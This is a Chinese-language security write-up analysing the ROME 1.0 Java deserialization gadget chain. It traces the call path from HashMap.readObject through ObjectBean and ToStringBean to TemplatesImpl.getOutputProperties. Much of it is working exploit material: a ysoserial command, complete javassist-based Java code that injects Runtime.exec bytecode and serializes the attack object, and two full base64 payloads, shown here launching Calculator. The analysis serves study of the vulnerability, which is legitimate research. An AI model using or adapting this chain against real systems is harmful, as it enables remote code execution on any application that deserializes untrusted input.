ROME 反序列化分析
环境搭建
首先找到rome-1.0下载地址 http://rometools.github.io/rome/ROMEReleases/rome-1.0.jar
IDEA新建一个Maven项目
然后导入rome包
File->Project Structure->Project Settings::Modules->+->rome-1.0.jar
(我本地java版本是1.8.0_121)
接着创建一个Poc.java用来触发漏洞
ximport java.io.ByteArrayInputStream;import java.io.IOException;import java.io.ObjectInputStream;import java.util.Base64;public class Poc { public static void main(String[] args) throws IOException,ClassNotFoundException { String base64_exp = "BASE64_STRING"; byte[] exp = Base64.getDecoder().decode(base64_exp); ByteArrayInputStream bytes = new ByteArrayInputStream(exp); ObjectInputStream objectInputStream = new ObjectInputStream(bytes); objectInputStream.readObject(); }}利用ysoserial生成弹计算器的payload:
xxxxxxxxxxjava -jar ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ROME 'open /System/Applications/Calculator.app'|base64xxxxxxxxxxrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAAAIAAAACc3IAKGNvbS5zdW4uc3luZGljYXRpb24uZmVlZC5pbXBsLk9iamVjdEJlYW6CmQfedgSUSgIAA0wADl9jbG9uZWFibGVCZWFudAAtTGNvbS9zdW4vc3luZGljYXRpb24vZmVlZC9pbXBsL0Nsb25lYWJsZUJlYW47TAALX2VxdWFsc0JlYW50ACpMY29tL3N1bi9zeW5kaWNhdGlvbi9mZWVkL2ltcGwvRXF1YWxzQmVhbjtMAA1fdG9TdHJpbmdCZWFudAAsTGNvbS9zdW4vc3luZGljYXRpb24vZmVlZC9pbXBsL1RvU3RyaW5nQmVhbjt4cHNyACtjb20uc3VuLnN5bmRpY2F0aW9uLmZlZWQuaW1wbC5DbG9uZWFibGVCZWFu3WG7xTNPa3cCAAJMABFfaWdub3JlUHJvcGVydGllc3QAD0xqYXZhL3V0aWwvU2V0O0wABF9vYmp0ABJMamF2YS9sYW5nL09iamVjdDt4cHNyAB5qYXZhLnV0aWwuQ29sbGVjdGlvbnMkRW1wdHlTZXQV9XIdtAPLKAIAAHhwc3EAfgACc3EAfgAHcQB+AAxzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7TAARX291dHB1dFByb3BlcnRpZXN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHAAAAAA/////3VyAANbW0JL/RkVZ2fbNwIAAHhwAAAAAnVyAAJbQqzzF/gGCFTgAgAAeHAAAAbAyv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEAKG9wZW4gL1N5c3RlbS9BcHBsaWNhdGlvbnMvQ2FsY3VsYXRvci5hcHAIADABAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAyADMKACsANAEADVN0YWNrTWFwVGFibGUBAB95c29zZXJpYWwvUHduZXI3NDM4Nzc3OTA0NjI5MDc5AQAhTHlzb3NlcmlhbC9Qd25lcjc0Mzg3Nzc5MDQ2MjkwNzk7ACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAAEAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAALgAOAAAADAABAAAABQAPADgAAAABABMAFAACAAwAAAA/AAAAAwAAAAGxAAAAAgANAAAABgABAAAAMwAOAAAAIAADAAAAAQAPADgAAAAAAAEAFQAWAAEAAAABABcAGAACABkAAAAEAAEAGgABABMAGwACAAwAAABJAAAABAAAAAGxAAAAAgANAAAABgABAAAANwAOAAAAKgAEAAAAAQAPADgAAAAAAAEAFQAWAAEAAAABABwAHQACAAAAAQAeAB8AAwAZAAAABAABABoACAApAAsAAQAMAAAAJAADAAIAAAAPpwADAUy4AC8SMbYANVexAAAAAQA2AAAAAwABAwACACAAAAACACEAEQAAAAoAAQACACMAEAAJdXEAfgAXAAAB1Mr+ur4AAAAyABsKAAMAFQcAFwcAGAcAGQEAEHNlcmlhbFZlcnNpb25VSUQBAAFKAQANQ29uc3RhbnRWYWx1ZQVx5mnuPG1HGAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQADRm9vAQAMSW5uZXJDbGFzc2VzAQAlTHlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkRm9vOwEAClNvdXJjZUZpbGUBAAxHYWRnZXRzLmphdmEMAAoACwcAGgEAI3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkRm9vAQAQamF2YS9sYW5nL09iamVjdAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgAAQABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAADsADgAAAAwAAQAAAAUADwASAAAAAgATAAAAAgAUABEAAAAKAAEAAgAWABAACXB0AARQd25ycHcBAHhzcgAoY29tLnN1bi5zeW5kaWNhdGlvbi5mZWVkLmltcGwuRXF1YWxzQmVhbvWKGLvl9hgRAgACTAAKX2JlYW5DbGFzc3QAEUxqYXZhL2xhbmcvQ2xhc3M7TAAEX29ianEAfgAJeHB2cgAdamF2YXgueG1sLnRyYW5zZm9ybS5UZW1wbGF0ZXMAAAAAAAAAAAAAAHhwcQB+ABRzcgAqY29tLnN1bi5zeW5kaWNhdGlvbi5mZWVkLmltcGwuVG9TdHJpbmdCZWFuCfWOSg8j7jECAAJMAApfYmVhbkNsYXNzcQB+ABxMAARfb2JqcQB+AAl4cHEAfgAfcQB+ABRzcQB+ABt2cQB+AAJxAH4ADXNxAH4AIHEAfgAjcQB+AA1xAH4ABnEAfgAGcQB+AAZ4
用之替换上面代码中的BASE64_STRING
运行即可看到弹出了计算器
利用链分析
利用链如下
xxxxxxxxxxTemplatesImpl.getOutputProperties()NativeMethodAccessorImpl.invoke0(Method, Object, Object[])NativeMethodAccessorImpl.invoke(Object, Object[])DelegatingMethodAccessorImpl.invoke(Object, Object[])Method.invoke(Object, Object...)ToStringBean.toString(String)ToStringBean.toString()ObjectBean.toString()EqualsBean.beanHashCode()ObjectBean.hashCode()HashMap<K,V>.hash(Object)HashMap<K,V>.readObject(ObjectInputStream)
因为要分析toString()(使用idea调试时,会默认调用实例的toString方法,并忽略toString使用的方法中的断点。)所以这里提前设置一下
首先到rome-1.0.jar!/com/sun/syndication/feed/impl/QbjectBean的hashCode()中下个断点以便后续分析
可以看到此时this._equalsBean为EqualsBean,于是会调用到EqualsBean.beanHashCode(),跟入之:
此时this.obj为ObjectBean,所以跟到了当前文件下的toString()方法:
上图也可以看出来this._obj._toStringBean为ToStringBean
导致触发了ToStringBean.toString():
这里从Variables里大概可以看出导致命令执行的地方就在this._obj里了,这个toString()作用是取一个prefix传入带参数的toString(String prefix)
然后进入toString(String prefix)
最终会运行到这一行并调用pReadMethod.invoke(this._obj,NO_PARAMS)从而触发精心构造的RCE
利用链构造
getOutputProperties() 如何RCE
首先要知道怎么直接通过可控.invoke(可控,NO_PARAMS)来达成RCE
从上面一张图中可以看出pReadMethod的name为getOutputProperties,且this._obj是TemplatesImpl
其实在TemplatesImpl中可以实现加载_bytecodes属性中的字节码来达成任意代码执行
先接着往下看,进一步跟进会到达这里:
然后会进入getTransletInstance()
到这里发现_class为null,会进入defineTransletClasses() 这个方法的作用是用ClassLoader加载字节码,并将其存在_class数组中,还是看一下代码比较清晰:
存入_class后会回到getTransletInstance()并调用
xxxxxxxxxxAbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].newInstance();导致最终的任意代码执行
我们导入javassist和rhino包先测试一下
xxxxxxxxxx<dependencies> <dependency> <groupId>org.javassist</groupId> <artifactId>javassist</artifactId> <version>3.25.0-GA</version> </dependency> <dependency> <groupId>org.mozilla</groupId> <artifactId>rhino</artifactId> <version>1.7.11</version> </dependency></dependencies>直接写个触发getOutputProperties()的exp:
xxxxxxxxxximport com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;import java.lang.reflect.Constructor;import java.lang.reflect.Method;import java.util.Properties;import javassist.ClassPool;import javassist.CtClass;public class Exp { public static class StaticBlock { } public static void main(String[] args) throws Exception{ // 生成恶意 bytecodes String code = "{System.out.println(\"aaaaaaaaaaa\");}"; ClassPool pool = ClassPool.getDefault(); CtClass clazz = pool.get(StaticBlock.class.getName()); clazz.setSuperclass(pool.get(Class.forName("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet").getName())); clazz.makeClassInitializer().insertBefore(code); byte[][] bytecodes = new byte[][]{clazz.toBytecode()}; Class templatesimpl = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"); Class[] types = {byte[][].class, String.class, Properties.class, int.class, TransformerFactoryImpl.class}; Constructor constructor = templatesimpl.getDeclaredConstructor(types); constructor.setAccessible(true); TransformerFactoryImpl tf = new TransformerFactoryImpl(); Properties p = new Properties(); Object[] params = {bytecodes,"test",p,1,tf}; Object object = constructor.newInstance(params); Method method = templatesimpl.getMethod("getOutputProperties"); method.invoke(object); }}执行成功
触发链
入口点是用的HashMap的readObject(),因为其key可控
然后hash(key)就可以和上面最开始下断点的位置rome-1.0.jar!/com/sun/syndication/feed/impl/QbjectBean的hashCode()续上
此时就形成一个完整的链
具体构造懒得再一步步写了,先写个hashmap.put()来触发测试,因为
注意要通过2个objectbean才能达成触发条件,才能在反序列化时key满足这个条件,才可到达触发链(这个地方还是稍微有点绕的)
测试代码如下:
xxxxxxxxxximport com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;import java.io.ByteArrayOutputStream;import java.io.ObjectOutputStream;import java.lang.reflect.Field;import java.util.HashMap;import com.sun.syndication.feed.impl.ObjectBean;import javassist.ClassPool;import javassist.CtClass;import javax.xml.transform.Templates;import java.util.Base64;public class Exp { public static class StaticBlock { } public static void main(String[] args) throws Exception{ // 生成恶意 bytecodes String code = "{java.lang.Runtime.getRuntime().exec(\"open /System/Applications/Calculator.app\");}"; ClassPool pool = ClassPool.getDefault(); CtClass clazz = pool.get(StaticBlock.class.getName()); clazz.setSuperclass(pool.get(Class.forName("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet").getName())); clazz.makeClassInitializer().insertBefore(code); byte[][] bytecodes = new byte[][]{clazz.toBytecode()}; // 实例化类并设置属性 TemplatesImpl templatesimpl = new TemplatesImpl(); Field fieldByteCodes = templatesimpl.getClass().getDeclaredField("_bytecodes"); fieldByteCodes.setAccessible(true); fieldByteCodes.set(templatesimpl, bytecodes); Field fieldName = templatesimpl.getClass().getDeclaredField("_name"); fieldName.setAccessible(true); fieldName.set(templatesimpl, "test"); Field fieldTfactory = templatesimpl.getClass().getDeclaredField("_tfactory"); fieldTfactory.setAccessible(true); fieldTfactory.set(templatesimpl, Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl").newInstance()); // 注意要通过2个objectbean才能达成触发条件 ObjectBean objectBean1 = new ObjectBean(Templates.class, templatesimpl); ObjectBean objectBean2 = new ObjectBean(ObjectBean.class, objectBean1); // hashmap.put触发 HashMap hashmap = new HashMap(); hashmap.put(objectBean2,"cccc"); }}
最终exp
最终生成序列化数据的exp如下:
xxxxxxxxxximport com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;import java.io.ByteArrayOutputStream;import java.io.ObjectOutputStream;import java.lang.reflect.Array;import java.lang.reflect.Constructor;import java.lang.reflect.Field;import java.util.HashMap;import com.sun.syndication.feed.impl.ObjectBean;import javassist.ClassPool;import javassist.CtClass;import javax.xml.transform.Templates;import java.util.Base64;public class Exp { public static class StaticBlock { } public static void main(String[] args) throws Exception{ // 生成恶意 bytecodes String code = "{java.lang.Runtime.getRuntime().exec(\"open /System/Applications/Calculator.app\");}"; ClassPool pool = ClassPool.getDefault(); CtClass clazz = pool.get(StaticBlock.class.getName()); clazz.setSuperclass(pool.get(Class.forName("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet").getName())); clazz.makeClassInitializer().insertBefore(code); byte[][] bytecodes = new byte[][]{clazz.toBytecode()}; // 实例化类并设置属性 TemplatesImpl templatesimpl = new TemplatesImpl(); Field fieldByteCodes = templatesimpl.getClass().getDeclaredField("_bytecodes"); fieldByteCodes.setAccessible(true); fieldByteCodes.set(templatesimpl, bytecodes); Field fieldName = templatesimpl.getClass().getDeclaredField("_name"); fieldName.setAccessible(true); fieldName.set(templatesimpl, "test"); Field fieldTfactory = templatesimpl.getClass().getDeclaredField("_tfactory"); fieldTfactory.setAccessible(true); fieldTfactory.set(templatesimpl, Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl").newInstance()); // 要通过2个objectbean才能达成触发条件 ObjectBean objectBean1 = new ObjectBean(Templates.class, templatesimpl); ObjectBean objectBean2 = new ObjectBean(ObjectBean.class, objectBean1); // 设置hashmap,参考ysoserial HashMap hashmap = new HashMap(); Field fieldsize = hashmap.getClass().getDeclaredField("size"); fieldsize.setAccessible(true); fieldsize.set(hashmap,2); Class nodeC = Class.forName("java.util.HashMap$Node"); Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC); nodeCons.setAccessible(true);// Object tbl = Array.newInstance(nodeC, 2); 也可以只写入objectBean2, 就是会报错(但还是执行了命令) Object tbl = Array.newInstance(nodeC, 1);// Array.set(tbl, 0, nodeCons.newInstance(0, objectBean1, objectBean1, null)); Array.set(tbl, 0, nodeCons.newInstance(0, objectBean2, objectBean2, null)); Field fieldtable = hashmap.getClass().getDeclaredField("table"); fieldtable.setAccessible(true); fieldtable.set(hashmap,tbl); // 输出base64后的序列化数据 ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); ObjectOutputStream out = new ObjectOutputStream(byteArrayOutputStream); out.writeObject(hashmap); byte[] sss = byteArrayOutputStream.toByteArray(); out.close(); String exp = Base64.getEncoder().encodeToString(sss); System.out.println(exp); }}
xxxxxxxxxxrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAAAIAAAACc3IAKGNvbS5zdW4uc3luZGljYXRpb24uZmVlZC5pbXBsLk9iamVjdEJlYW6CmQfedgSUSgIAA0wADl9jbG9uZWFibGVCZWFudAAtTGNvbS9zdW4vc3luZGljYXRpb24vZmVlZC9pbXBsL0Nsb25lYWJsZUJlYW47TAALX2VxdWFsc0JlYW50ACpMY29tL3N1bi9zeW5kaWNhdGlvbi9mZWVkL2ltcGwvRXF1YWxzQmVhbjtMAA1fdG9TdHJpbmdCZWFudAAsTGNvbS9zdW4vc3luZGljYXRpb24vZmVlZC9pbXBsL1RvU3RyaW5nQmVhbjt4cHNyACtjb20uc3VuLnN5bmRpY2F0aW9uLmZlZWQuaW1wbC5DbG9uZWFibGVCZWFu3WG7xTNPa3cCAAJMABFfaWdub3JlUHJvcGVydGllc3QAD0xqYXZhL3V0aWwvU2V0O0wABF9vYmp0ABJMamF2YS9sYW5nL09iamVjdDt4cHNyAB5qYXZhLnV0aWwuQ29sbGVjdGlvbnMkRW1wdHlTZXQV9XIdtAPLKAIAAHhwc3IAOmNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwJV0/BbqyrMwMABkkADV9pbmRlbnROdW1iZXJJAA5fdHJhbnNsZXRJbmRleFsACl9ieXRlY29kZXN0AANbW0JbAAZfY2xhc3N0ABJbTGphdmEvbGFuZy9DbGFzcztMAAVfbmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wAEV9vdXRwdXRQcm9wZXJ0aWVzdAAWTGphdmEvdXRpbC9Qcm9wZXJ0aWVzO3hwAAAAAP////91cgADW1tCS/0ZFWdn2zcCAAB4cAAAAAF1cgACW0Ks8xf4BghU4AIAAHhwAAACYcr+ur4AAAAxACQKAAMADwcAEQcAEgEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQALU3RhdGljQmxvY2sBAAxJbm5lckNsYXNzZXMBABFMRXhwJFN0YXRpY0Jsb2NrOwEAClNvdXJjZUZpbGUBAAhFeHAuamF2YQwABAAFBwATAQAPRXhwJFN0YXRpY0Jsb2NrAQAQamF2YS9sYW5nL09iamVjdAEAA0V4cAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHABQKABUADwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHABgBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAaABsKABkAHAEAKG9wZW4gL1N5c3RlbS9BcHBsaWNhdGlvbnMvQ2FsY3VsYXRvci5hcHAIAB4BAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAgACEKABkAIgAhAAIAFQAAAAAAAgABAAQABQABAAYAAAAvAAEAAQAAAAUqtwAWsQAAAAIABwAAAAYAAQAAAA8ACAAAAAwAAQAAAAUACQAMAAAACAAXAAUAAQAGAAAAFgACAAAAAAAKuAAdEh+2ACNXsQAAAAAAAgANAAAAAgAOAAsAAAAKAAEAAgAQAAoACXB0AAR0ZXN0cHcBAHhzcgAoY29tLnN1bi5zeW5kaWNhdGlvbi5mZWVkLmltcGwuRXF1YWxzQmVhbvWKGLvl9hgRAgACTAAKX2JlYW5DbGFzc3QAEUxqYXZhL2xhbmcvQ2xhc3M7TAAEX29ianEAfgAJeHB2cgAdamF2YXgueG1sLnRyYW5zZm9ybS5UZW1wbGF0ZXMAAAAAAAAAAAAAAHhwcQB+ABJzcgAqY29tLnN1bi5zeW5kaWNhdGlvbi5mZWVkLmltcGwuVG9TdHJpbmdCZWFuCfWOSg8j7jECAAJMAApfYmVhbkNsYXNzcQB+ABlMAARfb2JqcQB+AAl4cHEAfgAccQB+ABJxAH4ABnNxAH4AAnNxAH4AB3EAfgAMcQB+AAZzcQB+ABh2cQB+AAJxAH4ABnNxAH4AHXEAfgAicQB+AAZxAH4AH3g=